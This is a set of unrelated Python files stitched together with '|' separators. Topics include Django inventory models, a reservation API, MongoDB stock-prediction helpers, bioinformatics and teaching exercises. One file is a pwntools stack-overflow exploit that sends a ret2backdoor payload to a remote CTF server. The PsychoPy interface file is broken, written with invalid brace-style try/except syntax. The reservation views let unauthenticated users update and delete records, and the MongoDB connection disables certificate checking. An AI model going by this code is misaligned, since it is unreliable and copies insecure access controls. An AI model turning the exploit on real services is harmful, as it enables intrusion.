is_active = models.BooleanField('是否可用', default=True)
created_date = models.DateTimeField('创建时间', auto_now_add=True)
class Meta:
db_table = 'cmdb_acc_accessory'
verbose_name = u'配件详细表'
verbose_name_plural = u'配件详细表'
class UseRecord(models.Model):
"""
CPU、内存、硬盘、网卡、光模块 配件,需要知道被哪个资产使用
"""
accessory = models.ForeignKey(Accessory, on_delete=models.CASCADE, help_text='配件')
server = models.ForeignKey(Server, on_delete=models.CASCADE, help_text='服务器', blank=True, null=True)
net_device = models.ForeignKey(NetDevice, on_delete=models.CASCADE, help_text='网络设备', blank=True, null=True)
operate = models.CharField('操作', max_length=7, choices=(('install', '安装'), ('remove', '取下')), default='install')
created_date = models.DateTimeField('创建时间', auto_now_add=True)
class Meta:
db_table = 'cmdb_acc_use_record'
verbose_name = u'配件使用记录表'
verbose_name_plural = u'配件使用记录表'
class InventoryRecord(models.Model):
accessory = models.CharField('配件', max_length=20, choices=accessory_item.items())
operate = models.CharField('操作', max_length=8, choices=(('purchase', '采购'), ('receive', '领用'), ('revert', '归还')))
server = models.ForeignKey(Server, on_delete=models.CASCADE, help_text='服务器', blank=True, null=True)
net_device = models.ForeignKey(NetDevice, on_delete=models.CASCADE, help_text='网络设备', blank=True, null=True)
content = models.CharField('内容', max_length=250, blank=True, null=True)
user = models.ForeignKey(User, on_delete=models.CASCADE, help_text='操作员')
created_date = models.DateTimeField('创建时间', auto_now_add=True)
class Meta:
db_table = 'cmdb_acc_inventory_record'
verbose_name = u'配件进货及消费记录表'
verbose_name_plural = u'配件进货及消费记录表'
|
# -*- coding: utf-8 -*-
import serial
import time
ser = serial.Serial('/dev/ttyUSB1', 9600)
def SringRead():
string=ser.readline()
return string
def StringWrite(string):
ser.write(string)
def main():
while(1):
var = input("Enter string: ")
if not var:
continue
StringWrite(var)
time.sleep(0.5)
result=SringRead()
if result:
print result
if __name__ == "__main__":
main()
|
from psychopy import parallel, core, event
import os, sys, inspect
import GlobalVariables
try{
import readPort
} except {
try{
# use this if you want to include modules from a subfolder
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"subfolder")))
if cmd_subfolder not in sys.path:
sys.path.insert(0, cmd_subfolder)
}
}
'''
Connects to a port and allows binary manipulation
Example: raise/lower an operant box hopper
portValue: a hexadecimal number use to represent the current values on the port
parallelPort: a pre-created ParallelPort with an existing address
maskValue: a hexadecimal number representing a bitmask which flips bits on the port
@author: Bradley Poulette
'''
class HardwareInterface:
def __init__(self, portValue, parallelPort, mask = 0x0000):
self.portValue = portValue;
self.parallelPort = parallelPort;
self.maskValue = mask
def turn_on(self):
portValue = portValue | (maskValue);
parallelPort.setData(portValue);
return portValue;
def turn_off(self):
portValue = portValue & ~(maskValue);
parallelPort.setData(portValue);
return portValue;
class Mouse:
def waitForExitPress(self, time = 0):
GlobalVariables.logger.writeToLog("Waiting for user to press escape")
if time == 0:
while True:
if event.getKeys(["escape"]):
GlobalVariables.logger.writeToLog("User pressed escape")
exit()
else:
waitTimer = core.CountdownTimer(time)
while (waitTimer.getTime() > 0):
if event.getKeys(["escape"]):
GlobalVariables.logger.writeToLog("User pressed escape")
exit()
def readValue(self, portValue, mask):
return (readPort.readPort(portValue) & mask)
#Reads IR beam status on port 0x0201 (GamePort)
def checkForApparatus():
#return True if apparatus present, False otherwise
try{
value = readPort.readPort(0x0201)
GlobalVariables.logger.writeToLog("Apparatus value " + str(value))
if value == 0x00ff:
return True
else:
return False
} except {
return false
} |
#!/usr/bin/python3
# -*- coding:utf-8 -*-
"""
@author: tianwen
@file: 累加.py
@time: 2020/8/14 9:06
@desc:
"""
# 第一种算法,运算速度慢于第二种,特别是在运行大量运算时
def func(n):
thesum = 0
for i in range(n + 1):
thesum += i
return thesum
print(func(100))
# 第二种算法,比第一种运算速度快
def fun(n):
for x in range(n + 1):
sum = ((1 + x) * x) / 2
return sum
print(fun(10)) |
def move( n, x, y, z): #将n个盘子从x借助y移动到z
if 1 == n :
print(x,"-->",z)
else :
move(n-1,x,z,y) #将n-1个盘子从x借助z移动到y
print(x,"-->",z) #将第n个盘子从x移动到z
move(n-1,y,x,z) #将n-1个盘子从y借助x移动到z
num=int(input("输入移动的圆盘数量"))
print("移动步骤如下:")
move(num,'X','Y','Z')
|
import requests
import os
import json
from py2neo import authenticate, Graph
import sys
if __name__ == "__main__":
# member_id = "19057581"
member_id = sys.argv[1]
key = os.environ['MEETUP_API_KEY']
uri = "https://api.meetup.com/2/groups?lat=51.5072&lon=0.1275&member_id={0}&key={1}".format(member_id, key)
r = requests.get(uri)
results = r.json()["results"]
group_ids = [str(item["id"]) for item in results]
print "Group ids for {0}".format(member_id)
print "{0}".format(group_ids)
authenticate("localhost:7474", "neo4j", "medium")
graph = Graph()
rows = graph.cypher.execute(
"""
MATCH (g:Group) WHERE g.id IN {group_ids}
MATCH (m:Member {id: {member_id}})
WHERE NOT (m)-[:MEMBER_OF]->(g)
RETURN g.id AS groupId, g.name as groupName
""", {"group_ids": group_ids, "member_id": str(member_id)})
print ""
print "Groups you aren't currently a member of:"
print rows
graph.cypher.execute(
"""
MATCH (g:Group) WHERE g.id IN {group_ids}
MATCH (m:Member {id: {member_id}}) WHERE NOT (m)-[:MEMBER_OF]->(g)
MERGE (m)-[membershipRel:MEMBER_OF]->(g)
ON CREATE SET membershipRel.joined = timestamp()
""", {"group_ids": group_ids, "member_id": str(member_id)})
|
import json
from django.contrib.auth import authenticate
from django.core.exceptions import ObjectDoesNotExist
from django.http import HttpResponse
from django.utils import timezone
from rest_framework import permissions, status, generics
from rest_framework.response import Response
from rest_framework.views import APIView
from travel.models import Product
from travel.paginations import StandardPagination
from .models import ReservationHost
from .serializers import ReservationSerializer, ReservationMemberSerializer
class MakeReservation(APIView):
permission_classes = (permissions.AllowAny,)
def post(self, request, *args, **kwargs):
name = request.data.get('username', '')
christian_name = request.data.get('christian_name', '')
phone_number = request.data.get('phone_number', '')
gender = request.data.get('gender', True)
product = request.data.get('product', '')
try:
product_object = Product.objects.get(pk=product)
except ObjectDoesNotExist:
data = {
'message': '순례 상품을 반드시 선택해 주세요!'
}
return HttpResponse(json.dumps(data),
content_type='application/json; charset=utf-8',
status=status.HTTP_400_BAD_REQUEST)
user, reservation_num_list = ReservationHost.objects.create_user(
name=name,
christian_name=christian_name,
phone_number=phone_number,
gender=gender,
product=product_object,
)
if user:
data = {
'product': user.product.title,
'username': user.username,
'christian_name': user.christian_name,
'phone_number': user.phone_number,
'gender': user.gender,
'reservation_num': f'{reservation_num_list[0]}-'
f'{reservation_num_list[1]}-'
f'{reservation_num_list[2]}-'
f'{reservation_num_list[-1]}'
}
return HttpResponse(json.dumps(data),
content_type='application/json; charset=utf-8',
status=status.HTTP_201_CREATED)
else:
data = {
'message': '입력 정보가 잘못되었습니다. 다시 입력해주세요!'
}
return HttpResponse(json.dumps(data),
content_type='application/json; charset=utf-8',
status=status.HTTP_400_BAD_REQUEST)
class CheckReservation(APIView):
permission_classes = (permissions.AllowAny,)
def post(self, request, *args, **kwargs):
name = request.data.get('name', '')
password = request.data.get('password', '')
user = authenticate(
username=name,
password=password,
)
if user:
data = {
'pk': user.pk,
'product': user.reservationhost.product.title,
'product_pk': user.reservationhost.product.pk,
'username': user.username,
'christian_name': user.reservationhost.christian_name,
'phone_number': user.reservationhost.phone_number,
'gender': user.reservationhost.gender,
}
return HttpResponse(json.dumps(data),
content_type='application/json; charset=utf-8',
status=status.HTTP_200_OK)
else:
data = {
'message': '입력 정보가 잘못되었습니다. 다시 입력해주세요!'
}
return HttpResponse(json.dumps(data),
content_type='application/json; charset=utf-8',
status=status.HTTP_400_BAD_REQUEST)
class CancelReservation(APIView):
permission_classes = (permissions.AllowAny,)
def post(self, request, *args, **kwargs):
name = request.data.get('name', '')
password = request.data.get('password', '')
user = authenticate(
username=name,
password=password,
)
if user:
product = user.reservationhost.product_id
host = user.pk
queryset = Product.objects.get(pk=product)
instance = queryset.reservationhost_set.get(pk=host)
instance.date_canceled = timezone.localtime()
instance.save()
instance.is_active = False
instance.save()
return Response(status.HTTP_200_OK)
else:
data = {
'message': '입력 정보가 잘못되었습니다. 다시 입력해주세요!'
}
return HttpResponse(json.dumps(data),
content_type='application/json; charset=utf-8',
status=status.HTTP_400_BAD_REQUEST)
class UpdateReservation(APIView):
permission_classes = (permissions.AllowAny,)
def patch(self, request, *args, **kwargs):
pass
class DestroyReservation(APIView):
permission_classes = (permissions.IsAuthenticated,)
def delete(self, request, *args, **kwargs):
pk = request.data.get('pk', '')
user = ReservationHost.objects.get(pk=pk)
if user:
user.delete()
return Response(status.HTTP_204_NO_CONTENT)
else:
data = {
'message': '입력 정보가 잘못되었습니다. 다시 입력해주세요!'
}
return HttpResponse(json.dumps(data),
content_type='application/json; charset=utf-8',
status=status.HTTP_400_BAD_REQUEST)
class AllReservationList(generics.ListAPIView):
permission_classes = (permissions.IsAuthenticatedOrReadOnly,)
pagination_class = StandardPagination
serializer_class = ReservationSerializer
def get_queryset(self):
product = Product.objects.all()
select = product.get(pk=self.kwargs['product_pk'])
return select.reservationhost_set.all()
class ActiveReservationList(generics.ListAPIView):
permission_classes = (permissions.IsAuthenticatedOrReadOnly,)
pagination_class = StandardPagination
serializer_class = ReservationSerializer
def get_queryset(self):
product = Product.objects.all()
select = product.get(pk=self.kwargs['product_pk'])
return select.reservationhost_set.filter(is_active=True)
class ReservationHostRetrieveDestroy(generics.RetrieveDestroyAPIView):
permission_classes = (permissions.IsAuthenticated,)
serializer_class = ReservationSerializer
lookup_url_kwarg = 'host_pk'
def get_queryset(self):
product = Product.objects.all()
select = product.get(pk=self.kwargs['product_pk'])
return select.reservationhost_set.all()
class ReservationMemberListCreate(generics.ListCreateAPIView):
permission_classes = (permissions.AllowAny,)
pagination_class = StandardPagination
serializer_class = ReservationMemberSerializer
def get_queryset(self):
host = ReservationHost.objects.all()
select = host.get(pk=self.kwargs['host_pk'])
return select.reservationmember_set.all()
class ReservationMemberRetrieveUpdateDestroy(generics.RetrieveUpdateDestroyAPIView):
permission_classes = (permissions.AllowAny,)
serializer_class = ReservationMemberSerializer
lookup_url_kwarg = 'member_pk'
def get_queryset(self):
host = ReservationHost.objects.all()
select = host.get(pk=self.kwargs['host_pk'])
return select.reservationmember_set.all()
|
from credentials import mongodb_key
from pymongo import MongoClient
from datetime import datetime, timedelta
import pandas as pd
# Set db access
db_client = MongoClient(f"mongodb+srv://{mongodb_key.username}:{mongodb_key.password}@clusterk.su3fg.azure.mongodb.net/<dbname>?ssl=true&ssl_cert_reqs=CERT_NONE&retryWrites=true&w=majority")
def db_last_update_date(ticker='AMZN', db_name='test_stock_raw', collection_name='amzn_raw', query_end_date=datetime.now(), db_first_date=datetime(2015,1,1)):
"""
# Check the last date of the existing stock data in DB
- Args: ticker, db_name, collection_name, query_end_date, db_first_date
- Returns: collection_last_date (datetime object)
"""
stock_db = db_client[db_name]
stock_collection = stock_db[collection_name]
if collection_name in stock_db.list_collection_names():
date_30_days_ago = query_end_date-timedelta(days=30)
# query stock data for the past 30 days from query_end_date
query_result = stock_collection.find({'Stock':ticker,
'Datetime': {'$gte': date_30_days_ago, '$lte': query_end_date}})
if query_result.count() > 0:
print(f'query_result.count() = {query_result.count()} for the past 30 days from {query_end_date}')
else:
print('query_result.count() = 0 for the past 30 days')
query_result = stock_collection.find({ 'Stock':ticker,
'Datetime': {'$gte': datetime(2015,1,1), '$lte': query_end_date}})
result_date_list = []
for x in list(query_result):
result_date_list.append(x['Datetime'])
# print(f'result_date_list from the query = {result_date_list}')
if len(result_date_list) == 0:
print(f'result_date_list is empty!!!')
else:
collection_last_date = max(result_date_list)
print(f'mongodb collection_last_date = {collection_last_date}')
else:
print("Creating a new collection since it doesn't exist.......")
print("Stock data between 2015-01-01 and today will be uploaded by default, unless selected otherwise.")
collection_last_date = db_first_date
return collection_last_date
############
def stock_data_query(ticker=['AMZN'], db_name='test_stock_raw', collection_name='amzn_raw', past_days=5*365):
"""
# Query raw stock data (for the past 5 years period, by default)
- Args: ticker, db_name, collection_name, past_days
- Returns: raw_df
"""
stock_db = db_client[db_name]
stock_collection = stock_db[collection_name]
if collection_name in stock_db.list_collection_names():
past_days_start = datetime.now() - timedelta(days=past_days+5) #manually added 5 more days
today = datetime.now()
# query stock data for the past 30 days ago from today
query_result = stock_collection.find({ 'Stock':ticker,
'Datetime': {'$gte': past_days_start, '$lte': today}})
raw_df = pd.DataFrame(list(query_result)).sort_values(by=['Datetime'], ascending=True)
else:
raw_df = pd.DataFrame({'Datetime':[]})
print(f'Query process interrupted... No collection {collection_name} in DB {db_name} exists!!')
return raw_df
############
def ml_pred_post(ticker=None, stock_last_day=None, train_pred_df=None, val_pred_df=None, test_pred_df=None,
X_features=None, y_features=None, n_past_days=90, n_future_days=5, loss='mean_squared_error', lr=0.01, epochs=12, batch_size=32, RMSE_train_pred=None, RMSE_val_pred=None):
"""
# Create a post (stock price prediction data with ML model parameters) for upload to MongoDB
- Args: ticker, stock_last_day, train_pred_df, val_pred_df, test_pred_df,
X_features, y_features, n_past_days, n_future_days,
loss, lr, epochs, batch_size,
RMSE_train_pred, RMSE_val_pred
- Returns: pred_post_to_upload
"""
try:
train_pred_df_dict = train_pred_df.to_dict(orient='records')
val_pred_df_dict = val_pred_df.to_dict(orient='records')
test_pred_df_dict = test_pred_df.to_dict(orient='records')
n_X_features = len(X_features)
n_y_features = len(y_features)
pred_post_to_upload = {
'Stock': ticker,
'Datetime': stock_last_day,
'X_features': X_features,
'y_features': y_features,
'n_past_days': n_past_days,
'n_future_days': n_future_days,
'ML Model': {
'model': 'LSTM',
'parameters': {
'layers': {'LSTM_1 units': 64,
'LSTM_1 input_shape': (n_past_days, n_X_features),
'LSTM_2 units': 32,
'Dropout': 0.2,
'Dense units': n_future_days*n_y_features
},
'compile': {
'optimizer': 'Adam',
'loss': str(loss),
'lr': lr
},
'fit': {
'epochs': epochs,
'batch_size': batch_size
}
},
},
'RMSE_train_pred': float(RMSE_train_pred),
'RMSE_val_pred': float(RMSE_val_pred),
'train_pred': train_pred_df_dict,
'val_pred': val_pred_df_dict,
'test_pred': test_pred_df_dict
}
return pred_post_to_upload
except Exception as e:
print('Something went wrong...')
print(f'str(e) = {str(e)}')
# print(f'repr(e) = {repr(e)}')
# return pred_post_to_upload
############
def stock_pred_upload(post, ticker = 'test_ticker', db_name='test_stock_pred'):
"""
# Upload a post (stock price prediction data with ML model parameters) to MongoDB
- Args: post, ticker, db_name
- Returns: n/a
"""
stock_pred_db = db_client[db_name]
stock_pred_collection = stock_pred_db[f'{ticker.lower()}_pred']
stock_pred_collection.insert_one(post)
print(f'{ticker} stock pred data upload to MongoDB successfully!')
stock_pred_db_collection_names = stock_pred_db.collection_names()
print(f'stock_pred_db_collection_names = {stock_pred_db_collection_names}')
############
def ml_pred_data_query(ticker='AMZN', db_name='test_stock_pred', collection_name='amzn_pred',
stock_last_date=None, n_future_days=5, n_past_days=90):
"""
# Query ML Model Prediction Data for the selected conditions from MongoDB
- Args: ticker, db_name, collection_name, stock_last_date, n_future_days, n_past_days
- Returns: query_result
"""
stock_db = db_client[db_name]
stock_collection = stock_db[collection_name]
if stock_last_date is str:
stock_last_date = datetime.strptime(stock_last_date, '%Y-%m-%d')
query_result = stock_collection.find({'Stock': ticker,
'Datetime': stock_last_date,
'n_future_days': n_future_days,
'n_past_days': n_past_days})
return query_result
############
def ml_pred_data_query_count(ticker='AMZN', db_name='test_stock_pred', collection_name='amzn_pred',
stock_last_date=None, n_future_days=5, n_past_days=90):
"""
# Check how many ML Model Prediction Data for the selected conditions exist in MongoDB collection
- Args: ticker, db_name, collection_name, stock_last_date, n_future_days, n_past_days
- Returns: query_result_count
"""
stock_db = db_client[db_name]
stock_collection = stock_db[collection_name]
if stock_last_date is str:
stock_last_date = datetime.strptime(stock_last_date, '%Y-%m-%d')
query_result_count = stock_collection.count_documents({'Stock': ticker,
'Datetime': stock_last_date,
'n_future_days': n_future_days,
'n_past_days': n_past_days})
return query_result_count
############
if __name__ == '__main__':
print("+++++++++ Checking <db_last_update_date> function... +++++++++++++")
### Check the last date of the existing stock data in MongoDB collection
collection_last_date = db_last_update_date(ticker='GOOG', db_name='test_stock_raw',
collection_name='goog_raw', query_end_date=datetime.now())
print(f'collection_last_date = {collection_last_date}')
print(f'collection_last_date in string format = {collection_last_date.strftime("%Y-%m-%d")}')
###
print("\n++++ Checking <db_last_update_date> + <ml_pred_data_query> function... ++++\n")
selected_stock = 'GOOG'
n_future_days = 3
last_pred_updated_date = db_last_update_date(ticker=selected_stock,
db_name='test_stock_pred', collection_name=f'{selected_stock.lower()}_pred')
print(f'last_pred_updated_date = {last_pred_updated_date}')
query_result = ml_pred_data_query(ticker=selected_stock, db_name='test_stock_pred',
collection_name=f'{selected_stock.lower()}_pred',
stock_last_date=last_pred_updated_date,
n_future_days=n_future_days)
# print(f'query_result = {list(query_result)}')
print(f'query_result.count() = {query_result.count()}')
# find the model result with the smallest RMSE_val_pred value
RMSE_val_pred_list = []
for i in range(query_result.count()):
RMSE_val_pred_list.append(query_result[i]["RMSE_val_pred"])
print(f'RMSE_train_pred {i} = {query_result[i]["RMSE_train_pred"]}')
print(f'RMSE_val_pred {i} = {query_result[i]["RMSE_val_pred"]}')
smallest_RMSE_index = RMSE_val_pred_list.index(min(RMSE_val_pred_list))
print(f'smallest_RMSE_index = {smallest_RMSE_index}')
# create test_pred_df using the query result with the smallest RMSE of the ml model
test_pred = query_result[smallest_RMSE_index]["test_pred"][0]
test_pred_datetime = test_pred["Datetime_list"]
test_pred_datetime_str = test_pred["Datetime_str"]
test_pred_adj_close = test_pred["Adj Close pred"]
test_pred_df = pd.DataFrame(list(zip(test_pred_datetime, test_pred_adj_close, test_pred_datetime_str)),
columns= ['Datetime', 'Adj Close pred', 'Datetime_str'])
print(f'test_pred_df: \n {test_pred_df}')
print(f'RMSE_train_pred = {query_result[smallest_RMSE_index]["RMSE_train_pred"]}')
print(f'RMSE_val_pred = {query_result[smallest_RMSE_index]["RMSE_val_pred"]}')
|
#!/usr/bin/python3 -u
import argparse
import os
import numpy as np
import os.path as op
import pandas as pd
from utils_wgbs import validate_files_list
from multiprocessing import Pool
from os.path import splitext, basename
import sys
from utils_wgbs import load_beta_data, trim_to_uint8, default_blocks_path, eprint
def get_bins(df):
end = 28217449 # todo: read this from a reference file
arr = np.unique(np.concatenate([[1], df['ssite'], df['esite'], [end]]))
arr.sort()
isin = np.isin(arr, np.concatenate([df['ssite'], [df['esite'][df.shape[0] - 1]]]))
return arr - 1, isin
def apply_filter_wrapper(args, blocks_bins, finds, beta_path, df):
try:
# load beta file:
data = load_beta_data(beta_path)
# reduce to blocks:
blocks_bins[-1] -= 1
reduced_data = np.add.reduceat(data, blocks_bins)[finds][:-1]
# dump to file
out_name = splitext(splitext(basename(args.blocks_file))[0])[0]
out_name = splitext(basename(beta_path))[0] + '_' + out_name + '.bin'
out_name = out_name.replace('_genome', '')
out_name = op.join(args.out_dir, out_name)
trim_to_uint8(reduced_data).tofile(out_name)
print(out_name)
if args.bedGraph:
with np.errstate(divide='ignore', invalid='ignore'):
beta_vals = reduced_data[:, 0] / reduced_data[:, 1]
eprint(beta_vals.shape, df.shape)
# beta_vals[reduced_data[:, 1] == 0] = np.nan
df['beta'] = beta_vals
df.to_csv(out_name.replace('.bin', '.bedGraph'), sep='\t',
index=None, header=None, na_rep=-1,
float_format='%.2f')
except Exception as e:
print('Failed with beta', beta_path)
print('Exception:', e)
def main():
"""
Collapse beta file to blocks binary file, of the same beta format
"""
args = parse_args()
files = args.input_files
validate_files_list(files, '.beta')
if not op.isfile(args.blocks_file):
eprint('Invalid blocks file:', args.blocks_file)
return
names = ['chr', 'sloc', 'eloc', 'ssite', 'esite']
df = pd.read_csv(args.blocks_file, sep='\t', usecols=[0, 1, 2, 3, 4], header=None, names=names)
nr_removed = df[df.ssite == df.esite].shape[0]
if nr_removed:
eprint('removed {} regions with no CpGs'.format(nr_removed))
if args.debug:
eprint(df[df.ssite == df.esite])
df = df[df.ssite < df.esite]
blocks_bins, filtered_indices = get_bins(df)
with Pool() as p:
for beta_path in files:
params = (args, blocks_bins,
filtered_indices, beta_path, df[['chr', 'sloc', 'eloc']])
p.apply_async(apply_filter_wrapper, params)
p.close()
p.join()
# for beta_path in files:
# reduced_data = apply_filter_wrapper(beta_path, args.blocks, args.cov_thresh)
def parse_args():
parser = argparse.ArgumentParser(description=main.__doc__)
parser.add_argument('input_files', nargs='+', help='one or more beta files')
parser.add_argument('-b', '--blocks_file', help='blocks path', default=default_blocks_path)
parser.add_argument('-o', '--out_dir', help='output directory. Default is "."', default='.')
parser.add_argument('--bedGraph', action='store_true', help='output a text file in addition to binary file')
parser.add_argument('--debug', '-d', action='store_true')
return parser.parse_args()
if __name__ == '__main__':
main()
|
from pwn import *
context.log_level = 'debug'
#p = process('./bjdctf_2020_babystack')
p = remote('node3.buuoj.cn',27983)
backdoor_addr = 0x4006e6
ret_addr = 0x400561
p.recvuntil('name:\n')
payload = b'a' * ( 0x10 + 8 ) + p64(ret_addr) + p64(backdoor_addr)
p.sendline(str(len(payload)))
p.recvuntil('name?\n')
p.sendline(payload)
p.interactive()
|
# Adapted for numpy/ma/cdms2 by convertcdms.py
import cdms2 as cdms, MV2 as MV, genutil
import sys
import cdat_info
pth=cdat_info.get_prefix()+'/sample_data/'
files = [ pth+'u_2000.nc',
pth+'u_2001.nc',
pth+'u_2002.nc',
]
for file in files:
f=cdms.open(file)
u=f('u')
if file == files[0]: # First file
sh=list(u.shape) # Create a list with the shape of the data
sh.insert(0,1) # Insert value 1 in front of the list
accumulation = u
newdim = MV.reshape(u,sh) # Create a new 1D dimension
else:
# add u at the end of accumaltion on dimension 0
accumulation = MV.concatenate((accumulation,u))
tmp = MV.reshape(u,sh) # Create a new 1D dimension
newdim = MV.concatenate((newdim,tmp)) # Add u to the newdim over the new dimension
f.close()
print accumulation.shape # All time added over the same dimension
print newdim.shape # Has a new dimension for years
avg = MV.average(accumulation)
std = genutil.statistics.std(newdim)
print avg.shape
print std.shape
|
numero = int(input("Dígame cuántas palabras tiene la primera lista: "))
if numero < 1:
print("¡Imposible!")
else:
primera = []
for i in range(numero):
print("Dígame la palabra", str(i + 1) + ": ", end="")
palabra = input()
primera += [palabra]
print("La primera lista es:", primera)
for i in range(len(primera)-1, -1, -1):
if primera[i] in primera[:i]:
del(primera[i])
numero2 = int(input("Dígame cuántas palabras tiene la segunda lista: "))
if numero2 < 1:
print("¡Imposible!")
else:
segunda = []
for i in range(numero2):
print("Dígame la palabra", str(i + 1) + ": ", end="")
palabra = input()
segunda += [palabra]
print("La segunda lista es:", segunda)
for i in range(len(segunda)-1, -1, -1):
if segunda[i] in segunda[:i]:
del(segunda[i])
comunes = []
for i in primera:
if i in segunda:
comunes += [i]
print("Palabras que aparecen en las dos listas:", comunes)
soloPrimera = []
for i in primera:
if i not in segunda:
soloPrimera += [i]
print("Palabras que sólo aparecen en la primera lista:", soloPrimera)
soloSegunda = []
for i in segunda:
if i not in primera:
soloSegunda += [i]
print("Palabras que sólo aparecen en la segunda lista:", soloSegunda)
todas = comunes + soloPrimera + soloSegunda
print("Todas las palabras:", todas) |
from graphframes import GraphFrame
# Need a dataset of edges and nodes
def get_graph(orig_df, predictions, orig_df_id_col="row_id", predictions_id_col="id"):
predictions_nodes = orig_df.withColumnRenamed(orig_df_id_col, "id")
predictions_edges = predictions.withColumnRenamed(f"{predictions_id_col}_l", "src").withColumnRenamed(
f"{predictions_id_col}_r", "dst").filter(predictions.prediction == 1.0)
return GraphFrame(predictions_nodes, predictions_edges)
def get_connected_components(*arg, **kwarg):
g = get_graph(*arg, **kwarg)
return g.connectedComponents()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.